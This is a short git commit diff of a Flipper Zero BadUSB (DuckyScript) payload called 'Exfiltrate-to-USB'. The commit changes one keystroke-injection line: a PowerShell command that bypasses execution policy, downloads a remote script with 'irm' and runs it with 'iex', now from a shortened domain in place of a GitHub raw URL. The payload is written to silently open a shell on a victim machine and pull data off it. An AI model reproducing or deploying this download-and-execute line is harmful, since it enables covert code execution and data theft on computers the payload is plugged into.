Update Exfiltrate-to-USB.txt

This commit is contained in:
egieb
2025-06-17 10:23:30 +00:00
committed by GitHub
parent d32a9edb3f
commit 8c2e91ae24

View File

@@ -15,6 +15,6 @@ REM open powershell
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -C $driveName = ''; $Hidden = ''; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-USB/main.ps1 | iex
STRING powershell -NoP -Ep Bypass -C $driveName = ''; $Hidden = ''; irm https://bw0.cc/exusb | iex
ENTER